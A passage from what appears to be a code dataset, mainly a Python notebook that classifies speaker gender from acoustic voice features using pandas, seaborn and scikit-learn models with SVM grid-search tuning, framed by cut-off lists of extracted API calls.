'rest_framework.serializers.URLField', 'serializers.URLField', ([], {}), '()\n', (3070, 3072), True, 'import rest_framework.serializers as serializers\n'), ((3088, 3115), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3113, 3115), True, 'import rest_framework.serializers as serializers\n'), ((3130, 3157), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3155, 3157), True, 'import rest_framework.serializers as serializers\n'), ((3177, 3204), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3202, 3204), True, 'import rest_framework.serializers as serializers\n'), ((3222, 3249), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3247, 3249), True, 'import rest_framework.serializers as serializers\n'), ((3271, 3298), 'rest_framework.serializers.DateTimeField', 
'serializers.DateTimeField', ([], {}), '()\n', (3296, 3298), True, 'import rest_framework.serializers as serializers\n'), ((3318, 3345), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3343, 3345), True, 'import rest_framework.serializers as serializers\n'), ((3367, 3394), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3392, 3394), True, 'import rest_framework.serializers as serializers\n'), ((3527, 3550), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (3548, 3550), True, 'import rest_framework.serializers as serializers\n'), ((3684, 3707), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (3705, 3707), True, 'import rest_framework.serializers as serializers\n'), ((3830, 3865), 'rest_framework.serializers.JSONField', 'serializers.JSONField', ([], {'default': 'dict'}), '(default=dict)\n', (3851, 3865), True, 'import rest_framework.serializers as serializers\n'), ((3882, 3939), 'rest_framework.serializers.StringRelatedField', 'serializers.StringRelatedField', ([], {'many': '(True)', 'read_only': '(True)'}), '(many=True, read_only=True)\n', (3912, 3939), True, 'import rest_framework.serializers as serializers\n'), ((4293, 4316), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (4314, 4316), True, 'import rest_framework.serializers as serializers\n'), ((4333, 4356), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (4354, 4356), True, 'import rest_framework.serializers as serializers\n'), ((4373, 4399), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {}), '()\n', (4397, 4399), True, 'import rest_framework.serializers as serializers\n'), ((4442, 4465), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (4463, 4465), True, 'import rest_framework.serializers as serializers\n'), ((4483, 4509), 
'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {}), '()\n', (4507, 4509), True, 'import rest_framework.serializers as serializers\n'), ((4520, 4542), 'rest_framework.serializers.URLField', 'serializers.URLField', ([], {}), '()\n', (4540, 4542), True, 'import rest_framework.serializers as serializers\n'), ((4558, 4585), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4583, 4585), True, 'import rest_framework.serializers as serializers\n'), ((4600, 4627), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4625, 4627), True, 'import rest_framework.serializers as serializers\n'), ((4647, 4674), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4672, 4674), True, 'import rest_framework.serializers as serializers\n'), ((4692, 4719), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4717, 4719), True, 'import rest_framework.serializers as serializers\n'), ((4741, 4768), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4766, 4768), True, 'import rest_framework.serializers as serializers\n'), ((4788, 4815), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4813, 4815), True, 'import rest_framework.serializers as serializers\n'), ((4836, 4863), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4861, 4863), True, 'import rest_framework.serializers as serializers\n'), ((4985, 5042), 'rest_framework.serializers.StringRelatedField', 'serializers.StringRelatedField', ([], {'many': '(True)', 'read_only': '(True)'}), '(many=True, read_only=True)\n', (5015, 5042), True, 'import rest_framework.serializers as serializers\n'), ((5059, 5084), 'job.serializers.JobTypeBaseSerializerV6', 'JobTypeBaseSerializerV6', ([], {}), '()\n', (5082, 5084), False, 'from 
job.serializers import JobTypeBaseSerializerV6\n'), ((5095, 5114), 'util.rest.ModelIdSerializer', 'ModelIdSerializer', ([], {}), '()\n', (5112, 5114), False, 'from util.rest import ModelIdSerializer\n'), ((5129, 5148), 'util.rest.ModelIdSerializer', 'ModelIdSerializer', ([], {}), '()\n', (5146, 5148), False, 'from util.rest import ModelIdSerializer\n'), ((5166, 5189), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (5187, 5189), True, 'import rest_framework.serializers as serializers\n'), ((5209, 5237), 'recipe.serializers.RecipeTypeBaseSerializerV6', 'RecipeTypeBaseSerializerV6', ([], {}), '()\n', (5235, 5237), False, 'from recipe.serializers import RecipeTypeBaseSerializerV6\n'), ((5251, 5270), 'util.rest.ModelIdSerializer', 'ModelIdSerializer', ([], {}), '()\n', (5268, 5270), False, 'from util.rest import ModelIdSerializer\n'), ((5289, 5312), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (5310, 5312), True, 'import rest_framework.serializers as serializers\n'), ((5325, 5348), 'batch.serializers.BatchBaseSerializerV6', 'BatchBaseSerializerV6', ([], {}), '()\n', (5346, 5348), False, 'from batch.serializers import BatchBaseSerializerV6\n'), ((5370, 5396), 'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {}), '()\n', (5394, 5396), True, 'import rest_framework.serializers as serializers\n'), ((5414, 5441), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (5439, 5441), True, 'import rest_framework.serializers as serializers\n'), ((5576, 5611), 'rest_framework.serializers.JSONField', 'serializers.JSONField', ([], {'default': 'dict'}), '(default=dict)\n', (5597, 5611), True, 'import rest_framework.serializers as serializers\n')] |
#!/usr/bin/env python
# coding: utf-8
# # Gender Recognition by Voice Kaggle [ Test Accuracy : 99.08 % ]
# In[ ]:
# ## CONTENTS::
# [ **1 ) Importing Various Modules and Loading the Dataset**](#content1)
# [ **2 ) Exploratory Data Analysis (EDA)**](#content2)
# [ **3 ) OutlierTreatment**](#content3)
# [ **4 ) Feature Engineering**](#content4)
# [ **5 ) Preparing the Data**](#content5)
# [ **6 ) Modelling**](#content6)
# [ **7 ) Parameter Tuning with GridSearchCV**](#content7)
# In[ ]:
# ## 1.1 ) Importing Various Modules
# In[ ]:
# Ignore the warnings
import warnings
warnings.filterwarnings('always')
warnings.filterwarnings('ignore')
# data visualisation and manipulation
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import style
import seaborn as sns
import missingno as msno
#configure
# sets matplotlib to inline and displays graphs below the corressponding cell.
style.use('fivethirtyeight')
sns.set(style='whitegrid',color_codes=True)
#import the necessary modelling algos.
from sklearn.linear_model import LogisticRegression
from sklearn.svm import LinearSVC
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn import datasets
from sklearn.naive_bayes import GaussianNB
#model selection
from sklearn.model_selection import train_test_split
from sklearn.model_selection import KFold
from sklearn.metrics import accuracy_score,precision_score,recall_score,confusion_matrix,roc_curve,roc_auc_score
from sklearn.model_selection import GridSearchCV
#preprocess.
# NOTE(review): `Imputer` was deprecated in scikit-learn 0.20 and removed in
# 0.22 (replaced by sklearn.impute.SimpleImputer) -- confirm the pinned
# scikit-learn version before upgrading.
from sklearn.preprocessing import MinMaxScaler,StandardScaler,Imputer,LabelEncoder,OneHotEncoder
# ## 1.2 ) Loading the Dataset
# In[ ]:
# Load the Kaggle "Gender Recognition by Voice" dataset; each row is one voice
# sample described by acoustic features plus the 'label' target column.
train=pd.read_csv(r"../../../input/primaryobjects_voicegender/voice.csv")
# In[ ]:
train.head(10)
# <a id="content2"></a>
# ## 2 ) Exploratory Data Analysis (EDA)
# ## 2.1 ) The Features and the 'Target' variable
# In[ ]:
# Work on a copy so the raw `train` frame stays untouched for later reference.
df=train.copy()
# In[ ]:
df.head(10)
# In[ ]:
df.shape
# In[ ]:
df.index
# In[ ]:
df.columns # give a short description of each feature.
# **#A short description as on 'Data' tab on kaggle is :**
# ####
#
# **meanfreq**: mean frequency (in kHz)
#
# **sd**: standard deviation of frequency
#
# **median**: median frequency (in kHz)
#
# **Q25**: first quantile (in kHz)
#
# **Q75**: third quantile (in kHz)
#
# **IQR**: interquantile range (in kHz)
#
# **skew**: skewness (see note in specprop description)
#
# **kurt**: kurtosis (see note in specprop description)
#
# **sp.ent**: spectral entropy
#
# **sfm**: spectral flatness
#
# **mode**: mode frequency
#
# **centroid**: frequency centroid (see specprop)
#
# **peakf**: peak frequency (frequency with highest energy)
#
# **meanfun**: average of fundamental frequency measured across acoustic signal
#
# **minfun**: minimum fundamental frequency measured across acoustic signal
#
# **maxfun**: maximum fundamental frequency measured across acoustic signal
#
# **meandom**: average of dominant frequency measured across acoustic signal
#
# **mindom**: minimum of dominant frequency measured across acoustic signal
#
# **maxdom**: maximum of dominant frequency measured across acoustic signal
#
# **dfrange**: range of dominant frequency measured across acoustic signal
#
# **modindx**: modulation index. Calculated as the accumulated absolute difference between adjacent measurements of fundamental frequencies divided by the frequency range
#
# **label**: male or female
# #### Note that we have 3168 voice samples and for each of sample 20 different acoustic properties are recorded. Finally the 'label' column is the target variable which we have to predict which is the gender of the person.
# ## 2.2 ) Missing Values Treatment
# In[ ]:
# check for null values.
df.isnull().any()
# In[ ]:
msno.matrix(df) # just to visualize. no missing value.
# ## 2.3 ) Univariate Analysis
# In this section I have performed the univariate analysis. Note that since all of the features are 'numeric' the most reasonable way to plot them would either be a 'histogram' or a 'boxplot'.
#
# Also note that univariate analysis is useful for outlier detection. Hence besides plotting a boxplot and a histogram for each column or feature, I have written a small utility function which tells the remaining no of observations for each feature if we remove its outliers.
# #### To detect the outliers I have used the standard 1.5 InterQuartileRange (IQR) rule which states that any observation lesser than 'first quartile - 1.5 IQR' or greater than 'third quartile +1.5 IQR' is an outlier.
# In[ ]:
# Summary statistics (count/mean/std/quartiles) for every numeric column.
df.describe()
# In[ ]:
def calc_limits(feature, data=None):
    """Return the (lower, upper) outlier fences for one column.

    Uses the standard 1.5*IQR rule: any value below ``Q1 - 1.5*IQR`` or
    above ``Q3 + 1.5*IQR`` is considered an outlier.

    Parameters
    ----------
    feature : str
        Name of the column to compute the fences for.
    data : pandas.DataFrame, optional
        Frame to read the column from.  Defaults to the module-level ``df``
        so existing call sites keep working unchanged.

    Returns
    -------
    tuple of float
        ``(lower_fence, upper_fence)``.
    """
    frame = df if data is None else data
    q1, q3 = frame[feature].quantile([0.25, 0.75])
    iqr = q3 - q1
    rang = 1.5 * iqr
    return (q1 - rang, q3 + rang)
# In[ ]:
def plot(feature):
    """Draw a boxplot and a distribution plot for one column of the
    module-level ``df``, and report how many observations would survive
    1.5*IQR outlier removal.

    Parameters
    ----------
    feature : str
        Column of ``df`` to visualise.
    """
    fig, axes = plt.subplots(1, 2)
    sns.boxplot(data=df, x=feature, ax=axes[0])
    sns.distplot(a=df[feature], ax=axes[1], color='#ff4125')
    fig.set_size_inches(15, 5)
    lower, upper = calc_limits(feature)
    # BUG FIX: the original comprehension appended the *whole* Series once per
    # inlier (`df[feature] for i in ...`), so the list held n copies of the
    # column; the count happened to be right, but the contents were wrong and
    # memory use was quadratic.  Collect the inlying values themselves.
    inliers = [i for i in df[feature] if i > lower and i < upper]
    print("Number of data points remaining if outliers removed : ", len(inliers))
# In[ ]:
plot('meanfreq')
# #### INFERENCES FROM THE PLOT--
#
# 1) First of all note that the values are in compliance with that observed from describe method data frame..
#
# 2) Note that we have a couple of outliers w.r.t. to 1.5 quartile rule (reprsented by a 'dot' in the box plot).Removing these data points or outliers leaves us with around 3104 values.
#
# 3) Also note from the distplot that the distribution seems to be a bit -ve skewed hence we can normalize to make the distribution a bit more symmetric.
#
# 4) LASTLY NOTE THAT A LEFT TAIL DISTRIBUTION HAS MORE OUTLIERS ON THE SIDE BELOW TO Q1 AS EXPECTED AND A RIGHT TAIL HAS ABOVE THE Q3.
# #### Similar other plots can be inferenced.
# In[ ]:
plot('sd')
# In[ ]:
plot('median')
# In[ ]:
plot('Q25')
# In[ ]:
plot('IQR')
# In[ ]:
plot('skew')
# In[ ]:
plot('kurt')
# In[ ]:
plot('sp.ent')
# In[ ]:
plot('sfm')
# In[ ]:
plot('meanfun')
# In[ ]:
# Class balance of the target: the bar plot and value_counts below show the
# dataset has equal numbers of 'male' and 'female' samples.
sns.countplot(data=df,x='label')
# In[ ]:
df['label'].value_counts()
# #### Note that we have equal no of observations for the 'males' and the 'females'. Hence it is a balanced class problem.
# ## 2.4 ) Bivariate Analysis
# ## 2.4.1 ) Corealtion b/w Features
# In this section I have analyzed the corelation between different features. To do it I have plotted a 'heat map' which clearly visulizes the corelation between different features.
# In[ ]:
# Encode the target column: 'male' -> 1, everything else ('female') -> 0.
# A vectorised boolean comparison replaces the original element-wise loop;
# the resulting integer column is identical.
df['label'] = (df['label'] == 'male').astype(int)
# In[ ]:
#corelation matrix.
cor_mat= df[:].corr()
mask = np.array(cor_mat)
# Mask out the lower triangle (it mirrors the upper one).
mask[np.tril_indices_from(mask)] = False
# NOTE(review): `mask` is prepared but no sns.heatmap(...) call follows --
# the plotting call was presumably stripped by the notebook export; confirm
# against the original kernel.
fig=plt.gcf()
fig.set_size_inches(30,12)
# #### SOME INFERENCES FROM THE ABOVE HEATMAP--
#
# 1) Mean frequency is moderately related to label.
#
# 2) IQR and label tend to have a strong positive corelation.
#
# 3) Spectral entropy is also quite highly corelated with the label while sfm is moderately related with label.
#
# 4) skewness and kurtosis aren't much related with label.
#
# 5) meanfun is highly negatively corelated with the label.
#
# 6) Centroid and median have a high positive corelationas expected from their formulae.
#
# 7) ALSO NOTE THAT MEANFREQ AND CENTROID ARE EXACTLY SAME FEATURES AS PER FORMULAE AND VALUES ALSO. HENCE THEIR CORELATION IS PERFCET 1. IN THAT CASE WE CAN DROP ANY COLUMN. note that centroid in general has a high degree of corelation with most of the other features.
#
# SO I WILL DROP THE 'CENTROID' COLUMN.
#
# 8) sd is highly positively related to sfm and so is sp.ent to sd.
#
# 9) kurt and skew are also highly corelated.
#
# 10) meanfreq is highly related to medaina s well as Q25.
#
# 11) IQR is highly corelated to sd.
#
# 12) Finally self relation ie of a feature to itself is equal to 1 as expected.
# #### Note that we can drop some highly corelated features as they add redundancy to the model but let us keep all the features for now. In case of highly corelated features we can use dimensionality reduction techniques like Principal Component Analysis(PCA) to reduce our feature space.
# In[ ]:
# 'centroid' duplicates 'meanfreq' exactly (perfect correlation of 1 per the
# heatmap analysis above), so drop the redundant column.
df.drop('centroid',axis=1,inplace=True)
# ## 2.4.2 ) Plotting the Features against the 'Target' variable
# Here I have just written a small utility function that plots the 'label' column vs the provided feature on a boxplot. In this way I have plotted some of the features against our target variable. This makes it easier to see the effect of the corressponding feature on the 'label'.
# In[ ]:
def plot_against_target(feature):
    """Box-plot one feature of the module-level ``df`` grouped by the
    'label' target (0 = female, 1 = male) on a 7x7-inch figure."""
    sns.factorplot(data=df, y=feature, x='label', kind='box')
    current_figure = plt.gcf()
    current_figure.set_size_inches(7, 7)
# In[ ]:
plot_against_target('meanfreq') # 0 for females and 1 for males.
# #### INFERENCES--
#
# 1) Firstly note that 0->'female' and 1->'male'.
#
# 2) Note that the boxpot depicts that the females in genral have higher mean frequencies than their male counterparts and which is a generally accepted fact.
# #### Again similar inferences can be drawn.
# In[ ]:
plot_against_target('sd')
# In[ ]:
plot_against_target('median')
# In[ ]:
plot_against_target('Q25')
# In[ ]:
plot_against_target('IQR')
# #### Note here that there is a remarkable difference b/w the inter quartile ranges of males and females.This is evident from the strong relation between 'label' and the 'IQR' in the heatmap plotted above.
# In[ ]:
plot_against_target('sp.ent')
# In[ ]:
plot_against_target('sfm')
# In[ ]:
plot_against_target('meanfun')
# #### Again high difference in females and males mean fundamental frequency. This is evident from the heat map which clearly shows the high corelation between meanfun and the 'label'.
# In[ ]:
# #### Now we move onto analyzing different features pairwise. Since all the features are continuous the most reasonable way to do this is plotting the scatter plots for each feature pair. I have also distinguished males and feamles on the same plot which makes it a bit easier to compare the variation of features within the two classes.
# In[ ]:
# Pairwise scatter plots of the most informative features, coloured by gender.
g = sns.PairGrid(df[['meanfreq','sd','median','Q25','IQR','sp.ent','sfm','meanfun','label']], hue = "label")
g = g.map(plt.scatter).add_legend()
# In[ ]:
# <a id="content3"></a>
# ## 3 ) Outlier Treatment
# In this section I have dealt with the outliers. Note that we discovered the potential outliers in the **'univariate analysis' ** section. Now to remove those outliers we can either remove the corressponding data points or impute them with some other statistical quantity like median (robust to outliers) etc..
# #### For now I shall be removing all the observations or data points which are outlier to 'any' feature. Note that this substantially reduces the dataset size.
# In[ ]:
# removal of any data point which is an outlier for any fetaure.
# Drop every row that is an outlier for *any* column (strict 1.5*IQR fences).
# Note: the fences are recomputed per column on the progressively filtered
# frame, so the filtering order follows the column order of `df`.
for column_name in df.columns:
    low_fence, high_fence = calc_limits(column_name)
    keep = (df[column_name] > low_fence) & (df[column_name] < high_fence)
    df = df.loc[keep]
# In[ ]:
df.shape
# In[ ]:
df.head(10)
# <a id="content4"></a>
# ## 4 ) Feature Engineering.
# ## 4.1 ) Dropping the features
# I have dropped some columns which according to my analysis proved to be less useful or redundant.
# In[ ]:
# Work on a fresh copy so the outlier-filtered `df` is left intact; drop the
# features judged redundant in the EDA above.
temp_df=df.copy()
temp_df.drop(['skew','kurt','mindom','maxdom'],axis=1,inplace=True) # only one of maxdom and dfrange.
temp_df.head(10)
#df.head(10)
# ## 4.2 ) Creating new features
# I have done two new things. Firstly I have made 'meanfreq','median' and 'mode' to comply by the standard relation->
# #### ......................................................................................3*Median=2*Mean +Mode.........................................................................
# #### For this I have adjusted values in the 'median' column as shown below. You can alter values in any of the other column say the 'meanfreq' column.
# In[ ]:
# Enforce the empirical relation 3*Median = 2*Mean + Mode by rebuilding the
# 'median' column from 'meanfreq' and 'mode': double the mean first, then
# median = (2*mean + mode) / 3.
# Vectorised column arithmetic replaces the original element-wise
# .apply(lambda ...) calls; the resulting float64 values are identical.
temp_df['meanfreq'] = temp_df['meanfreq'] * 2
temp_df['median'] = (temp_df['meanfreq'] + temp_df['mode']) / 3
# In[ ]:
temp_df.head(10)
# In[ ]:
sns.boxplot(data=temp_df,y='median',x='label') # seeing the new 'median' against the 'label'.
# The second new feature that I have added is a new feature to mesure the 'skewness'.
# #### For this I have used the 'Karl Pearson Coefficent' which is calculated as shown below->
# **** ..........................................................Coefficent = (Mean - Mode )/StandardDeviation......................................................****
# **You can also try some other coefficient also and see how it comapres with the target i.e. the 'label' column.**
# In[ ]:
# Pearson's first skewness coefficient: (mean - mode) / sd.
# NOTE(review): 'meanfreq' was doubled in the section above, so this
# coefficient is computed from the doubled mean -- presumably intentional,
# but worth confirming.
temp_df['pear_skew']=temp_df['meanfreq']-temp_df['mode']
temp_df['pear_skew']=temp_df['pear_skew']/temp_df['sd']
temp_df.head(10)
# In[ ]:
sns.boxplot(data=temp_df,y='pear_skew',x='label') # plotting new 'skewness' against the 'label'.
# <a id="content5"></a>
# ## 5 ) Preparing the Data
# ## 5.1 ) Normalizing the Features.
# In[ ]:
# Standardise the features (zero mean, unit variance); the 'label' column is
# held out as the target vector.
scaler=StandardScaler()
scaled_df=scaler.fit_transform(temp_df.drop('label',axis=1))
X=scaled_df
# BUG FIX: Series.as_matrix() was deprecated in pandas 0.23 and removed in
# 1.0; `.values` returns the same ndarray on every pandas version.
# (`df` and `temp_df` share the same row index after the outlier filtering,
# so taking the target from `df` is equivalent.)
Y=df['label'].values
# ## 5.2 ) Splitting into Training and Validation sets.
# In[ ]:
# 80/20 train/validation split with a fixed seed for reproducibility.
x_train,x_test,y_train,y_test=train_test_split(X,Y,test_size=0.20,random_state=42)
# In[ ]:
# <a id="content6"></a>
# ## 6 ) Modelling
# Fit each baseline classifier on the training split and print its accuracy
# on the held-out validation split.  The identical fit/predict/score sequence
# that was copy-pasted six times is factored into one helper; the fitted
# estimators keep their original names and the printed output is unchanged.
def _fit_and_score(model):
    """Fit `model` on (x_train, y_train) and return its accuracy on (x_test, y_test)."""
    model.fit(x_train, y_train)
    return accuracy_score(model.predict(x_test), y_test)
# #### LOGISTIC REGRESSSION
# In[ ]:
clf_lr = LogisticRegression()
print(_fit_and_score(clf_lr))
# #### kNN
# In[ ]:
clf_knn = KNeighborsClassifier()
print(_fit_and_score(clf_knn))
# #### Support Vector Machine (SVM)
# In[ ]:
clf_svm = SVC()
print(_fit_and_score(clf_svm))
# #### DECISION TREE
# In[ ]:
clf_dt = DecisionTreeClassifier()
print(_fit_and_score(clf_dt))
# #### RANDOM FOREST
# In[ ]:
clf_rf = RandomForestClassifier()
print(_fit_and_score(clf_rf))
# #### GRADIENT BOOSTING
# In[ ]:
clf_gb = GradientBoostingClassifier()
print(_fit_and_score(clf_gb))
# #### We can now move onto comparing the results of various modelling algorithms. for tthis I shall combine the results of all models in a data frame and then plot using a barplot .
# In[ ]:
# Re-fit every candidate model and collect the validation accuracies into a
# DataFrame for a side-by-side bar plot.
models=[LogisticRegression(),LinearSVC(),SVC(kernel='rbf'),KNeighborsClassifier(),RandomForestClassifier(),DecisionTreeClassifier(),GradientBoostingClassifier(),GaussianNB()]
model_names=['LogisticRegression','LinearSVM','rbfSVM','KNearestNeighbors','RandomForestClassifier','DecisionTree','GradientBoostingClassifier','GaussianNB']
acc = []
# Iterate the estimators directly instead of indexing with range(len(...)),
# and build the summary dict once after the loop (the original re-created it
# on every iteration).
for clf in models:
    clf.fit(x_train, y_train)
    pred = clf.predict(x_test)
    acc.append(accuracy_score(pred, y_test))
d = {'Modelling Algo': model_names, 'Accuracy': acc}
# In[ ]:
acc_frame=pd.DataFrame(d)
acc_frame
# In[ ]:
sns.barplot(y='Modelling Algo',x='Accuracy',data=acc_frame)
# In[ ]:
# <a id="content7"></a>
# ## 7 ) Parameter Tuning with GridSearchCV
# 1. I have tuned only SVM Similarly other algorithms can be tuned.
# In[ ]:
# Exhaustive grid search over the SVM hyper-parameters (C, gamma, kernel)
# with 10-fold cross-validation on the training split.
params_dict={'C':[0.001,0.01,0.1,1,10,100],'gamma':[0.001,0.01,0.1,1,10,100],'kernel':['linear','rbf']}
clf=GridSearchCV(estimator=SVC(),param_grid=params_dict,scoring='accuracy',cv=10)
clf.fit(x_train,y_train)
# In[ ]:
clf.best_score_
# In[ ]:
clf.best_params_
# In[ ]:
# accuracy_score is symmetric in its two arguments, so the order is harmless here.
print(accuracy_score(clf.predict(x_test),y_test))
# In[ ]:
# BUG FIX: sklearn's signature is precision_score(y_true, y_pred).  The
# original passed the predictions as y_true, which (since
# precision(a, b) == recall(b, a)) silently reported the classifier's
# *recall* instead of its precision.
print(precision_score(y_test,clf.predict(x_test)))
# ### The precision is almost 99.5 % which is quite high.
# ### After tuning SVM gives an amazing accuracy of around 99.1 %. Similarly tuning other algorithms parameters might give even greater accuracy !!!
# In[ ]:
# ## THE END!!!
# In[ ]:
| [
"pandas.read_csv",
"sklearn.neighbors.KNeighborsClassifier",
"missingno.matrix",
"numpy.array",
"matplotlib.style.use",
"seaborn.set",
"seaborn.distplot",
"sklearn.tree.DecisionTreeClassifier",
"pandas.DataFrame",
"numpy.tril_indices_from",
"sklearn.model_selection.train_test_split",
"matplotl... | [((600, 633), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""always"""'], {}), "('always')\n", (623, 633), False, 'import warnings\n'), ((634, 667), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (657, 667), False, 'import warnings\n'), ((945, 973), 'matplotlib.style.use', 'style.use', (['"""fivethirtyeight"""'], {}), "('fivethirtyeight')\n", (954, 973), False, 'from matplotlib import style\n'), ((974, 1018), 'seaborn.set', 'sns.set', ([], {'style': '"""whitegrid"""', 'color_codes': '(True)'}), "(style='whitegrid', color_codes=True)\n", (981, 1018), True, 'import seaborn as sns\n'), ((1888, 1954), 'pandas.read_csv', 'pd.read_csv', (['"""../../../input/primaryobjects_voicegender/voice.csv"""'], {}), "('../../../input/primaryobjects_voicegender/voice.csv')\n", (1899, 1954), True, 'import pandas as pd\n'), ((4017, 4032), 'missingno.matrix', 'msno.matrix', (['df'], {}), '(df)\n', (4028, 4032), True, 'import missingno as msno\n'), ((6314, 6347), 'seaborn.countplot', 'sns.countplot', ([], {'data': 'df', 'x': '"""label"""'}), "(data=df, x='label')\n", (6327, 6347), True, 'import seaborn as sns\n'), ((6963, 6980), 'numpy.array', 'np.array', (['cor_mat'], {}), '(cor_mat)\n', (6971, 6980), True, 'import numpy as np\n'), ((7026, 7035), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (7033, 7035), True, 'import matplotlib.pyplot as plt\n'), ((10504, 10618), 'seaborn.PairGrid', 'sns.PairGrid', (["df[['meanfreq', 'sd', 'median', 'Q25', 'IQR', 'sp.ent', 'sfm', 'meanfun',\n 'label']]"], {'hue': '"""label"""'}), "(df[['meanfreq', 'sd', 'median', 'Q25', 'IQR', 'sp.ent', 'sfm',\n 'meanfun', 'label']], hue='label')\n", (10516, 10618), True, 'import seaborn as sns\n'), ((12499, 12547), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'temp_df', 'y': '"""median"""', 'x': '"""label"""'}), "(data=temp_df, y='median', x='label')\n", (12510, 12547), True, 'import seaborn as sns\n'), ((13221, 13272), 
'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'temp_df', 'y': '"""pear_skew"""', 'x': '"""label"""'}), "(data=temp_df, y='pear_skew', x='label')\n", (13232, 13272), True, 'import seaborn as sns\n'), ((13429, 13445), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (13443, 13445), False, 'from sklearn.preprocessing import MinMaxScaler, StandardScaler, Imputer, LabelEncoder, OneHotEncoder\n'), ((13645, 13699), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'Y'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(X, Y, test_size=0.2, random_state=42)\n', (13661, 13699), False, 'from sklearn.model_selection import train_test_split\n'), ((13805, 13825), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {}), '()\n', (13823, 13825), False, 'from sklearn.linear_model import LogisticRegression\n'), ((13950, 13972), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {}), '()\n', (13970, 13972), False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((14124, 14129), 'sklearn.svm.SVC', 'SVC', ([], {}), '()\n', (14127, 14129), False, 'from sklearn.svm import SVC\n'), ((14267, 14291), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {}), '()\n', (14289, 14291), False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((14425, 14449), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ([], {}), '()\n', (14447, 14449), False, 'from sklearn.ensemble import RandomForestClassifier\n'), ((14587, 14615), 'sklearn.ensemble.GradientBoostingClassifier', 'GradientBoostingClassifier', ([], {}), '()\n', (14613, 14615), False, 'from sklearn.ensemble import GradientBoostingClassifier\n'), ((15486, 15501), 'pandas.DataFrame', 'pd.DataFrame', (['d'], {}), '(d)\n', (15498, 15501), True, 'import pandas as pd\n'), ((15525, 15586), 'seaborn.barplot', 'sns.barplot', ([], {'y': '"""Modelling Algo"""', 'x': '"""Accuracy"""', 'data': 'acc_frame'}), 
"(y='Modelling Algo', x='Accuracy', data=acc_frame)\n", (15536, 15586), True, 'import seaborn as sns\n'), ((5014, 5032), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {}), '(1, 2)\n', (5026, 5032), True, 'import matplotlib.pyplot as plt\n'), ((5036, 5079), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'df', 'x': 'feature', 'ax': 'axes[0]'}), '(data=df, x=feature, ax=axes[0])\n', (5047, 5079), True, 'import seaborn as sns\n'), ((5082, 5138), 'seaborn.distplot', 'sns.distplot', ([], {'a': 'df[feature]', 'ax': 'axes[1]', 'color': '"""#ff4125"""'}), "(a=df[feature], ax=axes[1], color='#ff4125')\n", (5094, 5138), True, 'import seaborn as sns\n'), ((6986, 7012), 'numpy.tril_indices_from', 'np.tril_indices_from', (['mask'], {}), '(mask)\n', (7006, 7012), True, 'import numpy as np\n'), ((8984, 9041), 'seaborn.factorplot', 'sns.factorplot', ([], {'data': 'df', 'y': 'feature', 'x': '"""label"""', 'kind': '"""box"""'}), "(data=df, y=feature, x='label', kind='box')\n", (8998, 9041), True, 'import seaborn as sns\n'), ((9047, 9056), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (9054, 9056), True, 'import matplotlib.pyplot as plt\n'), ((13888, 13916), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (13902, 13916), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14037, 14065), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (14051, 14065), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14194, 14222), 